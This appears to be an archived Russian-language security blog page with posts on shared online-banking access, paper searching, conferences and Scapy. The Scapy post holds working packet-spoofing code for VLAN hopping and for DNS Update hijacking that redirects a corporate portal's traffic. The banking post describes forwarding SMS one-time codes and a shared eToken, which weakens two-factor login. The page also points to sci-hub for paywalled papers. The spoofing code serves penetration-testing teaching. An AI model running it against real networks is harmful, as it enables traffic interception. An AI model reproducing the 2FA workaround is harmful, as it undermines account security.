Архив
Совместный удаленный доступ к ДБО
Решил поделиться решением задачи по совместному удаленному доступу к ДБО, вдруг кому-то будет полезно.
Итак, дано:
Есть доступ в систему ДБО. Логин-пароль, вход подтверждается по SMS, вход возможен только при наличии eToken’а класса Aladdin Pro. Подпись документов, отправляемых в банк, происходит тоже с помощью ключей.
Требуется:
Организовать возможность доступа в систему ДБО в общем случае N удаленных людей.
Решение:
Вся инфраструктура в нашей локальной сети доступна удаленным пользователям через OpenVPN. В локальной сети поднимается виртуальная машина, в хост в USB вставляется eToken и подключается к виртуальной машине. На виртуальную машину устанавливается ПО USB over Network, которое позволяет подключить удаленное USB-устройство к локальной машине так же, как если бы оно было вставлено в локальный USB-порт. Далее eToken расшаривается для удаленного доступа, конечно с паролем.
Теперь SMS. Берется любой планшет или телефон на Android, ставится программа SMS Forwarder, в которой задается правило: все смс с такого-то номера отправлять на такие-то почтовые адреса. Android-устройство подключатся к WiFi-сети нашей инфраструктуры. Очевидно, в устройстве должна стоять та SIM-карта, на которую приходят одноразовые пароли.
Works like Charm.
p.s. Чего-то мне кажется, что всякие банковские трояны используют эту схему уже давно. Полагаю, спецы подтвердят.
Как быстро искать научные статьи
Думаю, многим любителям академических работ будет полезно. Не претендуя на полноту, решил описать свой способ поиска новых статей в своей предметной области (web & application security).
Шаг 1. Берем статью 2010-2011 года близкой нам тематики из любого источника из списка ниже:
— https://seclab.cs.ucsb.edu/academic/publishing/
— http://www.iseclab.org/publications.html
— http://www.ieee-security.org/TC/SP-Index.html
— https://www.usenix.org/publications/proceedings
Пусть, например, мы выбрали статью про создание black-box сканера уязвимостей, который учитывает состояние веб-приложения: «Enemy of the State: A State-Aware Black-Box Web Vulnerability Scanner».
Шаг 2. Берем интересные нам статьи и ищем, кто за последние годы на них ссылался. Делается это так:
— либо ищем название статьи в Google Scholar и кликаем в выдаче «Cited By»; в нашем случае будет выдано 17 статей — http://scholar.google.com/scholar?cites=15644735933810005707
— либо ищем название статьи в portal.acm.org и переходим во вкладку «Cited By»; в нашем случае будет выдано 4 статьи — http://dl.acm.org/citation.cfm?id=2362793.2362819.
Шаг 3. Для каждой новой заинтересовавшей нас статьи из ссылающихся на исходную повторяем Шаг 2. Обычно рекурсия не заходит глубже второго уровня.
Шаг 4. Качаем выбранные статьи и читаем. Для тех, кто не в курсе, платные статьи можно скачать через http://sci-hub.org/.
Удачной охоты!
p.s. Буду благодарен за related типсы и триксы, если кто знает.
Налетай, не скупись, засылай рукопись!
Плохо иметь системное критическое мышление. Вместо того, чтобы радостно писать «новые» тулзы и каждый день придумывать инновационные методы, приходится маленькими шажками через reject’ы, скепсис коллег и неудачные гипотезы продвигаться вперед в любимой предметной области. Труден и тернист путь самурая от академии, ибо ждут его не только неудачи, но и искушения: высокие зарплаты в индустрии, удаленная работа фрилансером из Тайланда и (не к ночи будь помянуты) стартапы.
Но viam supervadet vadens. Любой же путь хорош привалами, на которых можно оглянуться назад, прикинуть, что впереди, поделиться с соратниками впечатлениями, послушать советов, пристроить путевые заметки в публикацию…
Вот уже в третий раз на форуме Positive Hack Days состоится огонёк для молодых ученых, Young School. Информацию по первому Young School можно найти вот тут, а по второму — вот тут.
В моем понимании, основной профит от участия в CFP, подобных нашему (т.е. с перекрестным анонимным рецензированием) — это _бесплатное_ получение квалифицированных рецензий на свою работу. Поверьте, чем раньше исследование попадает на оценку к непричастному человеку, тем лучше.
В качестве побочного эффекта от получения положительных рецензий на свои работы у авторов появится возможность побывать и выступить на самом форуме, при этом их расходы за проезд и проживание будут полностью компенсированы организаторами мероприятия (Positive Technologies). Кстати, такого нет ни на одной известной мне академической конференции.
И еще кое-что немаловажное. В этом году мы также принимаем тезисы на английском языке. Приглашения уже разосланы нашим друзьям за океан, в свободную Европу и тоталитарный Китай. Вот и посмотрим, где сильнее Свободный Академический ДухЪ.
Правила конкурса опубликованы на офисайте форума. По всем вопросам можно смело писать на секретный ящик youngschool@phdays.com или задавать тут.
[Константин Безносов @ МГУ] Вопросы безопасности и конфиденциальности в современных социальных сетях
Приглашаем всех желающих посетить лекцию Константина Безносова из Университета Британской Колумбии по теме «Security and Privacy in Online Social Networks», которая состоится на факультете ВМК МГУ 25 июня в 12:00.
Аннотация. Каждый месяц Фейсбуком пользуются больше людей чем жителей любой страны мира, за исключением Китая и Индии. Более того, эти пользователи проводят там порядка получаса каждый день, просматривая чужие или обновляя свои статусы, или просто «тусясь». Поэтому не удивительно, что социальные сети привлекают огромное внимание широкой и разносортной публики. К примеру, в 2011 активисты «Арабской весны» использовали социальные сети как средство коммуникаций, а в 2012 году американский президент Обама во время перевыборных собрал $690 миллионов через социальные сети. Не обошли стороной социальные сети и разного рода организации (коммерческие и правовые), которые, законно и не очень «проталкивают» свои услуги и товары, или собирают информацию по интересующих им пользователям. Такое множество заинтересованных лиц остро ставит интригующий и спорный вопрос безопасности и конфиденциальности в современных социальных сетях. В данной лекции будет проведён обзор международных исследований по этому вопросу, опубликованных за последние 5 лет. Материал лекции предназначен для широкой аудитории. Лекция будет на английском языке, вопросы и ответы могут быть на русском.
О лекторе:
Konstantin Beznosov, Associate Professor in Laboratory for Education and Research in Secure Systems Engineering, Department of Electrical and Computer Engineering, University of British Columbia
Био: http://konstantin.beznosov.net/professional/bio
Как обычно, для прохода в МГУ понадобится пропуск МГУ, либо можно пройти по паспорту, прислав предварительно мне (petandr на gmail.com) или Денису Гамаюнову (gamajun на cs.msu.su) полные фамилию, имя и отчество.
Безопасность веб-приложений: starter edition
В минувший четверг в рамках инициативы проведения вебинаров RISSPA провел первую часть обучающего вебинара по безопасности веб-приложений.
Материалы (видео, презентация, ролик по использованию Browser Exploitation Framework) доступны на сайте RISSPA.
Буду рад выслушать от профи хинты по методике введения в безопасность веб-приложений. Вот уже 4 года пытаюсь найти что-то оптимальное — пока остановился вот на таком подходе. Ну и пожелания по темам следующей части можно также оставить здесь.
Для удобства подключу их и сюда.
Трансляция:
Презентация:
Ролик по использованию Browser Exploitation Framework (смотреть в HD):
The Tangled Web
Являясь давним поклонником таланта Михаила Залевского, постоянно слежу за тем, что же делает гуру безопасности. Из его последних полезных проектов можно отметить:
- Книгу Silence on the Wire;
- Сборник информации по безопасности браузеров — Browser Security Handbook;
- Сканер веб-приложений с открытым исходным кодом skipfish.
И вот очередной релиз — книга "The tangled web". Лично я, ознакомившись с содержанием, уже сделал предзаказ. Кроме того, думаю сделать эту книгу базовой для студентов, которые приходят на веб-безопасность в нашу лабу. Кстати, издатель недавно выложил одну из глав новой книги, которая доступна вот тут.
Ну и в заключении список наиболее интересных постов Михаила с моей скромной точки зрения:
Lessons learned: как надо и как не надо сравнивать сканеры
Уже не первый год мне интересна тема сравнения сканеров уязвимостей (посты по теме — раз, два и три). В небольшой серии постов под названием «Lessons learned» я поделюсь своим видением проблемы — надеюсь, кому-то это окажется полезным в систематизации его миропредставления.
Первая тема — это критерии сравнения сканеров. Тег «Далее»
Горячая пора инноваций от CISS
Порой вспоминаю я студенческие годы, и воспоминания эти безрадостны. Не было тебе ни Google Summer of Code, ни Bounty Hunt’ов; Интернетов и то было раз, два — и обчелся. Вот откуда, скажите, молодому человеку, особенно летом, взять мотивацию на познание неведомых тайн? То ли дело сейчас — тут тебе и новые знания, и какая-никакая репутация, да еще деньги за это платят. Мотивации выше крыши!
На моей памяти в области информационной безопасности возможность получить опыт + $$ были только в рамках OWASP Seasons of Code (их было три — в 2007, 2008 и 2009 годах), плюс в рамках Google Summer of Code кое-какие проекты. Я не беру в расчет Bounty Hunt от Google или Mozilla — там уже надо быть состоявшимся специалистом, плюс никаких консультаций там никто не даст.
И вот, наконец, такая акция проводится в России. CISS в лице Никиты Тараканова приглашает всех принять участие в «CISS Hot Summer«, в рамках которой каждый имеет возможность получить бесценный опыт в области бинарного анализа да еще получить за это денег.
Хочется пожелать организаторам успеха в их славном начинании: побольше участников, побольше завершенных проектов и побольше модернизационных инноваций :)
p.s. Plz, RT
Scapy: швейцарский нож пентестера
Типичной задачей во время тестирования защищенности сетевой инфраструктуры является spoofing служебных протоколов: ARP, DHCP, DNS, SNMP и т.п. Вот лишь небольшой перечень интересных тестов:
— ARP spoofing/DNS spoofing;
— VLAN hopping;
— управление DNS-сервером с помощью DNS Update‘ов с IP-адресов из management-сегмента (не без IP spoofing);
— управление сетевыми устройствами через SNMP с IP-адресов из management-сегмента (не без IP spoofing).
Для проведения каждой атаки есть специализированные инструменты. Однако мне больше по нраву Scapy — настоящий швейцарский нож. Scapy позволяет написать на питоне небольшой сценарий по отправке пакетов практически с произвольным содержанием полей! Например, добавить два, три, чытере VLAN-тега:
sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src='00:01:02:03:04:05')/Dot1Q(vlan=1)/Dot1Q(vlan=10)/IP(dst='255.255.255.255', src='192.168.0.1')/ICMP())
А вот как можно использовать DNS Update с подменой IP-адреса для управления A-записями локального DNS-сервера:
e=Ether()
i=IP(src="192.168.128.58",dst="10.10.0.253")
u=UDP(sport=5353,dport=53)
dns=DNS()
dns.id=12345
dns.opcode=5
dns.qdcount=1
dns.ancount=1
dns.nscount=1
dns.qd=DNSQR(qname="company.any",qtype="SOA",qclass="IN")
dns.an=DNSRR(rrname="portal.company.any",rclass="ANY",type=255,ttl=0)
dns.ns=DNSRR(rrname="portal.company.any",rclass="ANY",type=255,ttl=0)
sendp(e/i/u/dns)
dns.ancount=0
dns.an=None
dns.ns=DNSRR(rrname="portal.company.any",type="A",ttl=200,rdata="10.1.3.13")
sendp(e/i/u/dns)
Где 10.10.0.253 — адрес DNS-сервера, 192.168.128.58 — адрес из management-сегмента (а иначе DNS-сервер не примет Update), а 10.1.3.13 — адрес нашего хоста, на котором мы поднимем прокси-сервер и будем слушать HTTP-трафик, идущий на корпоративный портал portal.company.any.
Список поддерживаемых протоколов внушает (можно даже лепить кадры протокола 802.11, который ВиФи). Всем интересующимся очень рекомендую познакомиться — обязательно полюбите этот инструмент.
Уязвимости механизма авторизации
В очередной раз пересматривая наши наработки по обнаружению уязвимостей в механизме авторизации веб-приложений, понял, что не знаю о вменяемом тексте на русском языке, который дает декомпозицию явления и рассматривает его со всех сторон. В результате, появился данный текст. Очень прошу оставить feedback на тему того, понятно ли написано, есть ли спорные моменты и был ли полезен данный текст. Буду переписывать до тех пор, пока не станет доходчиво, как в букваре. Заранее спасибо. Тег «Далее»
Безопасность веб-приложений: просто о сложном 